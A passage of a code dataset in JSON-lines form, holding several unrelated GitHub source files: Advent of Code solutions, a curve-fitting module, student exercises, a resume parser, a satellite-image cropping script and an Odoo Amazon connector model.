to_split.left >= 10:\n left = floor(to_split.left / 2)\n right = ceil(to_split.left / 2)\n to_split.left = SnailNumber(left, right, to_split.depth + 1)\n to_split.left.parent = to_split\n\n else:\n left = floor(to_split.right / 2)\n right = ceil(to_split.right / 2)\n to_split.right = SnailNumber(left, right, to_split.depth + 1)\n to_split.right.parent = to_split\n\n\ndef reduce(snail_number):\n reduced = False\n while not reduced:\n # check for explosion\n to_explode = snail_number.find_explosion()\n if to_explode is not None:\n explode(to_explode)\n continue\n # check for split\n to_split = snail_number.find_split()\n if to_split is not None:\n split(to_split)\n continue\n reduced = True\n return snail_number\n\n\ndef add_snail_numbers(snail1, snail2):\n snail1.update_depth()\n snail2.update_depth()\n add_snail = SnailNumber(snail1, snail2)\n snail1.parent = add_snail\n snail2.parent = add_snail\n return add_snail\n\n\ndef part1():\n snail_numbers = read_input()\n cur_number = snail_numbers[0]\n for i in range(1, len(snail_numbers)):\n addition = add_snail_numbers(cur_number, snail_numbers[i])\n cur_number = reduce(addition)\n return cur_number.magnitude()\n\n\ndef part2():\n magnitudes = []\n snail_numbers = read_input()\n for i in range(len(snail_numbers)):\n for j in range(len(snail_numbers)):\n if i != j:\n addition = add_snail_numbers(snail_numbers[i], snail_numbers[j])\n addition = reduce(addition)\n magnitudes.append(addition.magnitude())\n\n # restore snail_numbers\n snail_numbers = read_input()\n return max(magnitudes)\n\nprint(part2())","repo_name":"mateosierens/AdventOfCode2021","sub_path":"Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18414325412","text":"#!/usr/bin/env python\n# -*- coding: ascii -*-\n\nr\"\"\"\nLinCurveFit fits a DataSet object to a linear sum of functions in x.\n\nUses the scipy.linalg.lstsq 
method to do a least squares curve fit.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom builtins import object\nfrom past.utils import old_div\n\n#\n# import statements here. (built-in first, then 3rd party, then yours)\nfrom numpy import dot, std, array, double, isfinite, corrcoef, ones, linspace, logspace, log10, column_stack\nfrom numpy import absolute, zeros, isnan, ma\nfrom scipy import linalg\nfrom scipy.optimize import leastsq\nimport numexpr\n\nfrom .helper_funcs import bestFloatStr, INFINITY, fortran_doubleStr\n\ninverseD = {'y':'y', '1/y':'1/(y)', 'log(y)':'exp(y)', 'exp(y)':'log(y)', \n 'log(1/y)':'1/exp(y)', 'exp(1/y)':'1/log(y)', \n '1/log(y)':'exp(1/(y))', '1/exp(y)':'log(1/(y))',\n 'y**2':'(y)**0.5', 'y**3':'(y)**(1./3.)', 'y**4':'(y)**0.25'}\n\n\ndef un_transform_y( y, ytran ):\n \n if ytran=='y':\n return y\n else:\n return numexpr.evaluate( inverseD[ytran] )\n\ndef eval_xrange( cArr, xArr, eqnStr ):# assume that eqnStr startswith \"y = \" \n # make special case for constant-only\n if 'x' not in eqnStr and 'c0' in eqnStr:\n return cArr[0] * ones(len(xArr))\n s = eqnStr[4:]\n cD = {'x':xArr} # dictionary for c0, c1, etc.\n for i,c in enumerate(cArr): # build local_dict to execute numexpr in\n cD['c%i'%i] = cArr[i]\n \n #if '/x'in eqnStr and ma.masked_equal(xArr, 0.0).any():\n # print 'Divide by Zero Warning...'\n # print 'evaluating s=',s\n # print 'eval=',numexpr.evaluate( s, local_dict=cD )\n \n return numexpr.evaluate( s, local_dict=cD )\n\nclass LinCurveFit(object):\n \"\"\"LinCurveFit fits a DataSet object to a linear sum of functions in x.\"\"\"\n\n @property\n def name(self):\n return self.get_eqn_str_w_consts()\n\n def eval_xrange(self, xPlotArr):\n return eval_xrange( self.cArr, xPlotArr, self.get_eqn_str_w_consts() )\n\n def __init__(self, ds, xtranL=None, ytran='y', fit_best_pcent=1,# e.g. 
['const', 'x', 'x**2'] \n cArrInp=None): # if cArrInp, then skip cArr calc and jump straight to std calc\n \"\"\"Inits and fits DataSet, ds, to xtranL\"\"\"\n \n self.fit_best_pcent = fit_best_pcent\n self._xymath_type = 'linfit'\n \n self.ds = ds # DataSet object\n self.dsTimeStamp = None # set to self.ds.timeStamp in calc_std_values_from_cArr\n self.xtranL = xtranL # list of x transformations\n self.ytran = ytran # can be 'y', '1/y', 'log(y)', etc.\n \n self.eqn_str_w_consts = None\n self.eqn_str_w_numbs = None\n self.corrcoef = 0.0\n self.std = None\n self.pcent_std = None\n \n # ONLY calc cArr if it is not input\n if cArrInp is None: # if constants are input, simply use them\n # First make good estimate of solution using matrix methods\n try:\n if self.fit_best_pcent:\n #print 'Getting A,y for pcent_std, xtranL, ytran=',xtranL, ytran\n A,y = ds.get_pcent_std_A_matrix( xtranL, ytran )\n else:\n #print 'Getting A,y for std, xtranL, ytran=',xtranL, ytran\n A,y = ds.get_A_matrix( xtranL, ytran )\n \n #print 'A=\\n',A \n #print 'y=',y\n self.cArr, resid, rank, sArr = linalg.lstsq(A, y)\n \n except:\n self.cArr = ones( len(xtranL) )\n\n #print 'ds.wtArr=, ytran=',(ds.wtArr, ytran)\n #print \"ytran!='y'\",ytran!='y'\n #print \"ds.wtArr is None\",ds.wtArr is None\n \n # To stay true to selection of \"Total Error\" or \"Percent Error\"\n # need to tweek matrix answer via leastsq approach.\n # Using good estimate of cArr from above, now use optimize leastsq\n if (not ds.wtArr is None) or ytran!='y':\n # After using matrix methods to estimate constants, use optimize.leastsq\n X = column_stack([ self.ds.getTransXArr(name) for name in self.xtranL ])\n \n def ss_func( cArr ):\n ytranArr = dot( X, cArr )\n yCalcArr = un_transform_y( ytranArr, self.ytran )\n \n if not self.ds.wtArr is None:\n #print 'Doing Linear fit with wtArr'\n if fit_best_pcent:\n return self.ds.wtArr * (yCalcArr - self.ds.yArr)/self.ds.yPcentDivArr\n else:\n return self.ds.wtArr * (yCalcArr - 
self.ds.yArr)\n else:\n if fit_best_pcent:\n return old_div((yCalcArr - self.ds.yArr),self.ds.yPcentDivArr)\n else:\n return yCalcArr - self.ds.yArr\n \n #print 'self.cArr Before =',self.cArr\n #print ' Before std=',self.std,' pcent_std=',self.pcent_std\n minResult = leastsq( ss_func, self.cArr)\n #print 'minResult =',minResult\n \n self.cArr = minResult[0]\n else:\n self.cArr = array(cArrInp, dtype=double)\n\n self.calc_std_values_from_cArr()\n \n \n def calc_std_values_from_cArr(self):\n if self.dsTimeStamp == self.ds.timeStamp:\n print('std and pcent_std left unchanged')\n return\n \n # First set LinCurveFit timeStamp to ds.timeStamp\n self.dsTimeStamp = self.ds.timeStamp\n self.corrcoef = 0.0 # in case it bombs show zero\n try:\n # if y is transformed, must un_transform_y\n X = column_stack([ self.ds.getTransXArr(name) for name in self.xtranL ])\n ytranArr = dot( X, self.cArr )\n self.yCalcArr = un_transform_y( ytranArr, self.ytran )\n #if self.fit_best_pcent:\n # self.yCalcArr *= ds.yArr\n \n self.corrcoef = corrcoef(self.yCalcArr, self.ds.yArr)[0][-1]\n if isnan(self.corrcoef):\n self.corrcoef = 0.0\n \n errArr = self.ds.yArr - self.yCalcArr\n \n self.std = std( errArr ) # Calc standard deviation\n except:\n self.std = INFINITY\n \n try:\n self.pcent_std = 100.0 * std( old_div(errArr,self.ds.yPcentDivArr) )\n if not isfinite( self.pcent_std ):\n self.pcent_std = INFINITY\n except:\n self.pcent_std = INFINITY\n\n def get_x_plot_array(self, Npoints=100, logScale=0, xmin=None, xmax=None):\n \n if xmin is None:\n xmin = self.ds.xmin\n \n if xmax is None:\n xmax = self.ds.xmax\n \n if logScale:\n xPlotArr = logspace(log10(xmin), log10(xmax), num=Npoints)\n else:\n xPlotArr = linspace(xmin, xmax, num=Npoints)\n return xPlotArr\n\n def get_xy_plot_arrays(self, Npoints=100, logScale=0, xmin=None, xmax=None):\n xPlotArr = self.get_x_plot_array(Npoints=Npoints, logScale=logScale, \n xmin=xmin, xmax=xmax)\n yPlotArr = self.eval_xrange( xPlotArr )\n return xPlotArr, 
yPlotArr\n \n def is_good_over_plot_range(self):\n '''Check for nan in plot range'''\n xPlotArr, yPlotArr = self.get_xy_plot_arrays()\n return not isnan(yPlotArr).any()\n\n def get_eqn_str_w_consts(self):\n if self.eqn_str_w_consts:\n return self.eqn_str_w_consts\n \n rhsL = []\n for i, xstr in enumerate( self.xtranL ):\n if '1/x' in xstr:\n rhsL.append( xstr.replace('1/x', 'c%i/x'%i) )\n else:\n rhsL.append( 'c%i*%s'%(i, xstr) )\n \n rhs = ' + '.join( rhsL )\n rhs = rhs.replace('*const','')\n \n invStr = inverseD[self.ytran]\n \n if '/y' in invStr:\n self.eqn_str_w_consts = 'y = ' + invStr.replace('y', '(%s)'%rhs)\n else:\n self.eqn_str_w_consts = 'y = ' + invStr.replace('y', rhs)\n \n #self.eqn_str_w_consts = self.eqn_str_w_consts.replace('**','^')\n return self.eqn_str_w_consts\n\n def get_eqn_str_w_numbs(self):\n if self.eqn_str_w_numbs:\n return self.eqn_str_w_numbs\n \n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n self.eqn_str_w_numbs = self.eqn_str_w_consts\n for i,c in enumerate( self.cArr ):\n starg = 'c%i'%i\n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(starg, '%s'%self.cArr[i])\n \n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(' + -',' - ')\n return self.eqn_str_w_numbs\n\n def get_fortran_eqn_str_w_numbs(self):\n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n self.eqn_str_w_numbs = self.eqn_str_w_consts\n for i,c in enumerate( self.cArr ):\n starg = 'c%i'%i\n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(starg, fortran_doubleStr(self.cArr[i]))\n \n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(' + -',' - ')\n return self.eqn_str_w_numbs\n\n def get_full_description(self):\n \"\"\"Returns a full summary of LinCurveFit.\"\"\"\n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n sL = [self.eqn_str_w_consts]\n for i,c in enumerate( self.cArr ):\n sL.append(' c%i = %s'%(i, bestFloatStr(c) ) )\n \n def get_desc( name, units ):\n if name:\n if units:\n return '%s (%s)'%(name, 
units)\n else:\n return name\n else:\n return units\n \n if self.ds.xName:\n sL.append(' x = %s'%get_desc(self.ds.xName, self.ds.xUnits) )\n if self.ds.yName:\n sL.append(' y = %s'%get_desc(self.ds.yName, self.ds.yUnits) )\n \n if isnan(self.corrcoef):\n sL.append(' Correlation Coefficient = Undefined' )\n else:\n sL.append(' Correlation Coefficient = %s'%bestFloatStr(self.corrcoef) )\n \n sL.append(' Standard Deviation = %s'%bestFloatStr(self.std) )\n sL.append(' Percent Standard Deviation = %s%%'%bestFloatStr(self.pcent_std) )\n sL.append('%s'%self.get_eqn_str_w_numbs() )\n \n return '\\n'.join( sL )\n\nif __name__=='__main__':\n from numpy import array, double\n from .dataset import DataSet\n \n xArr = array( [1,2,3,4,5,6], dtype=double)\n yArr = array( [10,5.49,0.89,-.14,-1.07,0.84], dtype=double)\n \n C = DataSet(xArr, yArr, xName='fiddle', yName='faddle')\n lf = LinCurveFit( C, ['const', 'x', 'x**2'])\n \n print(lf.get_full_description())\n print()\n #print \"INFINITY =\", bestFloatStr(INFINITY)\n print()\n \n \n lf2 = LinCurveFit( C, ['1/x', 'x'], ytran='1/y')\n \n print(lf2.get_full_description())\n print()\n \n # y = 3.3888 + 0.3725*x\n xArr3 = array( [1, 3, 5, 7, 10, 12, 13, 16, 18, 20], dtype=double)\n yArr3 = array( [4, 5, 6, 5, 8, 7, 6, 9, 12, 11], dtype=double)\n C3 = DataSet(xArr3, yArr3, xName='LaDee', yName='Daa', xUnits='inches', yUnits='degF')\n lf3 = LinCurveFit( C3, ['const', 'x'])\n print(lf3.get_full_description())\n print()\n\n","repo_name":"sonofeft/XYmath","sub_path":"xymath/linfit.py","file_name":"linfit.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29872520382","text":"# 06 함수의_기초_02\n# 다음과 같이 사용자 2명으로부터 가위, 바위, 보를 입력 받아\n# 위, 바위, 보 규칙이 정의된 함수를 이용해 승패를 결정하는 코드를 작성하십시오.\n\n# input = \n# 홍길동\n# 이순신\n# 가위\n# 바위\n# output = 바위가 이겼습니다!\n\nrsp = ['가위', '바위', '보']\n\ndef play_RSP():\n Player1 = input('Player1: ')\n Player2 = 
input('Player2: ')\n RSP_1 = input('Player1_RSP: ')\n RSP_2 = input('Player2_RSP: ')\n return RSP_1, RSP_2\n\ndef RSP_result(play_rsp):\n if play_rsp[0] == rsp[0]:\n if play_rsp[1] == rsp[1]:\n result = '바위가 이겼습니다!'\n elif play_rsp[1] == rsp[2]:\n result = '가위가 이겼습니다!'\n \n elif play_rsp[0] == rsp[1]:\n if play_rsp[1] == rsp[0]:\n result = '바위가 이겼습니다!'\n elif play_rsp[1] == rsp[2]:\n result = '보가 이겼습니다!'\n\n elif play_rsp[0] == rsp[2]:\n if play_rsp[1] == rsp[0]:\n result = '가위가 이겼습니다!'\n elif play_rsp[1] == rsp[1]:\n result = '보가 이겼습니다!'\n \n elif play_rsp[0] == play_rsp[1]:\n result = '비겼습니다!'\n \n elif play_rsp[0] != rsp or play_rsp[1] != rsp:\n result = 'Error'\n\n return result\n\n\nRSP = play_RSP()\nrsp_result = RSP_result(RSP)\n\nprint(rsp_result)","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2021/07/0718/06 예제_02.py","file_name":"06 예제_02.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8863744031","text":"#!/usr/bin/env python\n\nfrom pyresparser import ResumeParser\nimport nltk\nimport spacy\nimport pandas as pd\n# import sys\n\n\n# fileurl = sys.argv[1]\nfileurl = './cv/01_rahul.pdf'\nnltk.download('stopwords')\nspacy.load('en_core_web_sm')\n# data = ResumeParser(str(fileurl)).get_extracted_data()\ndata = ResumeParser(fileurl).get_extracted_data()\n\nname = data['name']\nemail = data['email']\nexp = int(data['total_experience'])\nif exp !=0: emp = 1\nelse: emp = 0\nprev_emp = data['designation']\n\nno_prev = len(prev_emp)\nif no_prev != 0 and exp == 0:\n exp = no_prev+1\n# for i in prev_emp:\n# if i.include('Manager') or i.include('Associate') or i.include('Developer') or i.include('Head'):\n# no_prev +=1\nedu = data['degree']\nedu_lvl = len(edu)\n\napdata = [exp, emp, no_prev, edu_lvl, 0, 0]\napid = fileurl.split('_')\napid = apid[0].split('/')\napid = 
apid[2]\n","repo_name":"Aakarsh-verma/Alegria-Hackathon-Hiring-Webapp","sub_path":"src/applicant/cvreader.py","file_name":"cvreader.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"28807320728","text":"import sys\nf = open(sys.argv[1], 'r')\n\nk = int(f.readline())\n\nlong_lines = [''] * k\n\nline_number = 0\nfor this_line in f:\n # if we haven't read k lines let, than this line should go in the\n # stack\n if line_number < k:\n long_lines.append(this_line.strip())\n line_number += 1\n continue\n # once we fill our stack, we need to sort it because we depend on\n # this fact later\n if line_number == k:\n long_lines.sort(key=len)\n long_lines.reverse()\n # continue processing\n if len(this_line.strip()) > len(long_lines[k-1]):\n # insert this line into long lines at a point in the list\n # such that it is still sorted\n idx = k - 1\n while idx > 0 and len(long_lines[idx-1]) < len(this_line.strip()):\n idx -= 1\n long_lines = long_lines[:idx] + [this_line.strip()] + long_lines[idx:-1]\n line_number += 1\n\n# print out the longest lines\nfor line in long_lines:\n print(line)\n","repo_name":"tnez/code-eval-submissions","sub_path":"longest-lines/submission.py3","file_name":"submission.py3","file_ext":"py3","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23463597979","text":"#!/usr/bin/python3\n\ndef isValid(s: str) -> bool:\n dicts = {')':'(',']':'[','}':'{'}\n stack = []\n if len(s) % 2 == 1:\n return False\n for i in s:\n if stack and i in dicts:\n if stack[-1] == dicts[i]:\n stack.pop()\n else:\n return False\n else:\n stack.append(i)\n return not stack\n\nif __name__ == '__main__':\n str = \"()\"\n 
print(isValid(str))\n","repo_name":"happyshui/leetcode","sub_path":"python/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12567890163","text":"import gdal\nimport pandas as pd\nimport rasterio\nfrom rasterio.tools.mask import mask\nfrom gdalconst import *\nimport numpy\nimport json\nfrom osgeo import gdal, ogr, osr\nfrom scipy.ndimage import imread\nimport os\nimport pickle\n\n# record information in Geojson file\n# including categorical ids, urls for labeled image, longitude and latitude\nids = [];\nurls = [];\nlongitude = [];\nlatitude = [];\n\n# my geojson file called harvey_list.geojson, you need to replace it with your file name\nwith open('harvey_list.geojson') as f:\n data = json.load(f)\n\nfor feature in data['features']:\n ids.append(feature['properties']['catalog_id'])\n urls.append(feature['properties']['chip_url'])\n longitude.append(feature['geometry']['coordinates'][0])\n latitude.append(feature['geometry']['coordinates'][1])\n\n# create dataframe to include all information above\n# add one column to record possible tif file's name for each observations in geojson\njson = pd.DataFrame({'ids': ids, 'urls': urls, 'long': longitude, 'lat': latitude, 'file': '0'})\n\n# set the path to reach the folder which include tif files\n# if you have the same directory with geojson file, just ignore this\nos.chdir('/Users/ZachCheu/PycharmProjects/DDS/links')\n\n\n# print out the range of longitutde and latitude of tif file within a square brackets\n# gt is the GetGeoTransform()\n# cols is the number of columns\n# rows is the number of rows\ndef GetRange(gt, cols, rows):\n ext = []\n ranges = []\n # get corner points\n xarr = [0, cols]\n yarr = [0, rows]\n for px in xarr:\n for py in yarr:\n x = gt[0] + (px * gt[1]) + (py * gt[2])\n y = gt[3] + (px * gt[4]) + (py * gt[5])\n ext.append([y, x])\n yarr.reverse()\n ranges.append([min(ext)[1], 
max(ext)[1]])\n ranges.append([min(ext)[0], max(ext)[0]])\n return ranges\n\n\n# create a new dataframe to record name of each tif file and its corresponding ranges\ntif_Range = pd.DataFrame(columns=['file_name', 'range'])\nfor filename in os.listdir(os.getcwd()):\n dataset = gdal.Open(filename, GA_ReadOnly)\n cols = dataset.RasterXSize\n rows = dataset.RasterYSize\n geotransform = dataset.GetGeoTransform()\n result = GetRange(geotransform, cols, rows)\n tif_Range = tif_Range.append({'file_name': filename, 'range': result}, ignore_index=True)\n\n# for each observation in geojson file, check whether its longitude and latitude are within the ranges for each tif file\n# if there's a tif's range satisfy, add the name of that tif file under the 'file' column in json dataframe\n# if more than one tif file satify, for now, I just used the last one\nfor i in range(json['file'].size):\n for j in range(tif_Range['range'].size):\n if (tif_Range['range'][j][1][0] < json['lat'][i] < tif_Range['range'][j][1][1] and tif_Range['range'][j][0][0] <\n json['long'][i] < tif_Range['range'][j][0][1]):\n json.loc[i, 'file'] = tif_Range['file_name'][j]\n\n # function for cropping\n\n\ndef Crop(filename, long, lat, output):\n dataset = gdal.Open(filename, GA_ReadOnly)\n cols = dataset.RasterXSize\n rows = dataset.RasterYSize\n bands = dataset.RasterCount\n driver = dataset.GetDriver().LongName\n projection = dataset.GetProjection()\n geotransform = dataset.GetGeoTransform()\n originX = geotransform[0] # top left x\n originY = geotransform[3] # top left y\n pixelWidth = geotransform[1]\n pixelHeight = -geotransform[5]\n band = dataset.GetRasterBand(1)\n\n # want to find raster indexes of top points, p1=[minX,maxY], and p2=[maxX, minY]\n xmin = long - 0.001\n ymax = lat + 0.001\n xmax = long + 0.001\n ymin = lat - 0.001\n geoms = [{'type': 'Polygon', 'coordinates': [[(xmin, ymax), (xmax, ymax), (xmax, ymin), (xmin, ymin)]]}]\n with rasterio.open(filename) as src:\n out_image, out_transform = 
mask(src, geoms, crop=True)\n out_meta = src.meta.copy()\n\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": out_image.shape[1],\n \"width\": out_image.shape[2],\n \"transform\": out_transform})\n\n # just set the directory to save cropped image\n os.chdir('C:\\\\Users\\\\Xiaoyan\\\\Desktop\\\\DDS Research\\\\Crop')\n with rasterio.open(output + \".tif\", \"w\", **out_meta) as dest:\n dest.write(out_image)\n\n\n# I only download 20 sample tif files\n# I pick one available observation for cropping image\n# later, just use a for loop to run all observations in same procedure\nfile = json['file'][64]\nlong = json['long'][64]\nlat = json['lat'][64]\n# create name for output\noutput = 'sample2'\n# use the function above to crop\nCrop(file, long, lat, output)","repo_name":"zachcheu/Disaster-Data-Science-Lab","sub_path":"crop_img.py","file_name":"crop_img.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72974820199","text":"import re\nwith open('./test.txt') as file:\n lines =[re.search(r'(nop|acc|jmp) (\\+|-)(\\d+)', line.strip()).groups() for line in file.readlines()]\n\ndef get_deltas_jump(direction, delta):\n return (0, int(delta) if direction == '+' else -int(delta))\n\ndef get_deltas_acc(direction, delta):\n return (int(delta) if direction == '+' else -int(delta), 1)\n\ndef execute_line(line, can_switch):\n (operation, direction, delta) = line\n\n if (operation == 'nop'): \n switch = get_deltas_jump(direction, delta) if can_switch else False\n return (0, 1, switch)\n elif (operation == 'acc'): return (*get_deltas_acc(direction, delta), False)\n elif (operation == 'jmp'): \n switch = (0, 1) if can_switch else False\n return (*get_deltas_jump(direction, delta), switch)\n\n\ni = 0\nacc = 0\nexecuted = set()\n\ndef spawn_program(i, acc, executed):\n switched_at = None\n switched = set()\n while i < len(lines):\n \n (acc_delta, line_delta, switch) = 
execute_line(lines[i], i not in switched and not switched_at)\n if switch: \n switched_at = (i, acc, executed)\n (acc_delta, line_delta) = switch\n else:\n executed.add(i)\n acc += acc_delta\n i += line_delta\n\n if i in executed and switched_at:\n (i, acc, executed) = switched_at\n switched.add(i)\n switched_at = None\n \n\n if (i not in executed):\n print(f'Success: {acc}')\n\nspawn_program(0, 0, set())","repo_name":"benj2468/holiday-coding-challenge","sub_path":"src/day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39275108625","text":"from openerp import models,fields,api\nfrom openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport time\nclass amazon_operations_ept(models.Model):\n _name=\"amazon.operations.ept\"\n _order = \"sequence,id\"\n \n @api.model\n def find_amazon_cron(self,action_id):\n xml_ids = ['amazon_ept_v10.ir_cron_import_amazon_orders',\n 'amazon_ept_v10.ir_cron_auto_update_order_status',\n 'amazon_ept_v10.ir_cron_auto_export_inventory',\n 'amazon_ept_v10.ir_cron_send_amazon_invoice_via_email',\n 'amazon_ept_v10.ir_cron_auto_import_settlement_report',\n 'amazon_ept_v10.ir_cron_auto_process_settlement_report'\n ]\n cron_ids = []\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id,raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n\n for instance in self.env['amazon.instance.ept'].search([]):\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id+'_instance_%d'%(instance.id),raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n \n for seller in self.env['amazon.seller.ept'].search([]):\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id+'_seller_%d'%(seller.id),raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n \n return cron_ids\n \n @api.one\n def _count_operations(self):\n if self.action_id and 
self.display_record_count:\n if self.action_id.res_model == 'ir.cron':\n cron_ids = self.find_amazon_cron(self.action_id)\n self.count_record = len(cron_ids) or 0\n else: \n domain =[]\n if self.action_id.domain:\n domain = eval(self.action_id.domain)\n count = self.env[self.action_id.res_model].search_count(domain)\n self.count_record = count or 0\n\n @api.multi\n def count_all(self):\n picking_obj=self.env['stock.picking']\n amazon_sale_order_obj=self.env['amazon.sale.order.ept']\n amazon_product_obj=self.env['amazon.product.ept']\n invoice_obj=self.env['account.invoice']\n amazon_order_refund_obj=self.env['amazon.order.refund.ept']\n for record in self:\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','confirmed')])\n record.count_picking_confirmed=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','assigned')])\n record.count_picking_assigned=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','partially_available')])\n record.count_picking_partial=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','done')])\n record.count_picking_done=len(pickings.ids)\n\n count_picking_late=[('min_date', '<', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)), ('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available')),('is_amazon_delivery_order','=',True)]\n count_picking_backorders=[('backorder_id', '!=', False), ('state', 'in', ('confirmed', 'assigned', 'waiting', 'partially_available')),('is_amazon_delivery_order','=',True)]\n count_picking=[('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available')),('is_amazon_delivery_order','=',True)]\n\n count_picking=picking_obj.search(count_picking)\n count_picking_late=picking_obj.search(count_picking_late)\n count_picking_backorders=picking_obj.search(count_picking_backorders)\n \n if count_picking:\n 
record.rate_picking_late=len(count_picking_late.ids)*100/len(count_picking.ids)\n record.rate_picking_backorders=len(count_picking_backorders.ids)*100/len(count_picking.ids)\n else:\n record.rate_picking_late=0\n record.rate_picking_backorders=0\n record.count_picking_late=len(count_picking_late.ids)\n record.count_picking_backorders=len(count_picking_backorders.ids)\n orders=amazon_sale_order_obj.search([('state','in',['draft','sent'])])\n record.count_quotations=len(orders.ids)\n orders=amazon_sale_order_obj.search([('state','not in',['draft','sent','cancel'])])\n record.count_orders=len(orders.ids)\n\n products=amazon_product_obj.search([('instance_id','!=',False),('exported_to_amazon','=',True)])\n record.count_exported_products=len(products.ids)\n products=amazon_product_obj.search([('instance_id','!=',False),('exported_to_amazon','=',False)])\n record.count_ready_products=len(products.ids)\n \n invoices=invoice_obj.search([('amazon_instance_id','!=',False),('state','=','open'),('type','=','out_invoice')])\n record.count_open_invoices=len(invoices.ids)\n\n invoices=invoice_obj.search([('amazon_instance_id','!=',False),('state','=','paid'),('type','=','out_invoice')])\n record.count_paid_invoices=len(invoices.ids)\n \n draft_amazon_order_refunds=amazon_order_refund_obj.search([('state','=','draft')])\n record.count_draft_refunds=len(draft_amazon_order_refunds.ids)\n paid_amazon_order_refunds=amazon_order_refund_obj.search([('state','=','validate')])\n record.count_paid_refunds=len(paid_amazon_order_refunds.ids)\n \n action_id = fields.Many2one('ir.actions.act_window',string='Action')\n url = fields.Char('Image URL')\n sequence = fields.Integer('Sequence')\n color = fields.Integer('Color')\n name = fields.Char('Name', translate=True, required=True)\n count_record = fields.Integer(compute=_count_operations, string='# Record')\n display_inline_image = fields.Boolean('Display Inline Image in Kanban ?')\n display_outline_image = fields.Boolean('Display Outline Image 
in Kanban ?')\n display_record_count = fields.Boolean('Display Number of records in Kanban ?')\n \n use_quotations=fields.Boolean('Quotations', help=\"Check this box to manage quotations\")\n use_products=fields.Boolean(\"Products\",help=\"Check this box to manage Products\")\n use_invoices=fields.Boolean(\"Invoices\",help=\"Check This box to manage Invoices\")\n use_refunds=fields.Boolean(\"Refunds\",help=\"Check This box to manage Refunds\")\n use_delivery_orders=fields.Boolean(\"Delivery Orders\",help=\"Check This box to manage Delivery Orders\")\n use_amazon_workflow=fields.Boolean(\"Use Amazon Workflow\",help=\"Check This box to manage Amazon Workflow\") \n use_log=fields.Boolean(\"Use Log\",help=\"Check this box to manage Amazon Log\")\n \n count_exported_products=fields.Integer(\"Count Exported Products\",compute=\"count_all\")\n count_ready_products=fields.Integer(\"Count Exported Products\",compute=\"count_all\")\n \n count_quotations=fields.Integer(\"Count Sales Quotations\",compute=\"count_all\")\n count_orders=fields.Integer(\"Count Sales Orders\",compute=\"count_all\")\n \n count_open_invoices=fields.Integer(string=\"Count Open Invoices\",compute=\"count_all\")\n count_paid_invoices=fields.Integer(string=\"Count Open Invoices\",compute=\"count_all\")\n \n count_draft_refunds=fields.Integer(string=\"Count Draft Refunds\",compute=\"count_all\")\n count_paid_refunds=fields.Integer(string=\"Count Paid Refunds\",compute=\"count_all\")\n \n rate_picking_late=fields.Integer(string=\"Count Rate Pickings\",compute=\"count_all\")\n rate_picking_backorders=fields.Integer(string=\"Count Back Orders\",compute=\"count_all\")\n count_picking_late=fields.Integer(string=\"Count Rate Pickings\",compute=\"count_all\")\n count_picking_backorders=fields.Integer(string=\"Count Back Orders\",compute=\"count_all\")\n\n count_picking_confirmed=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n count_picking_assigned=fields.Integer(string=\"Count Picking 
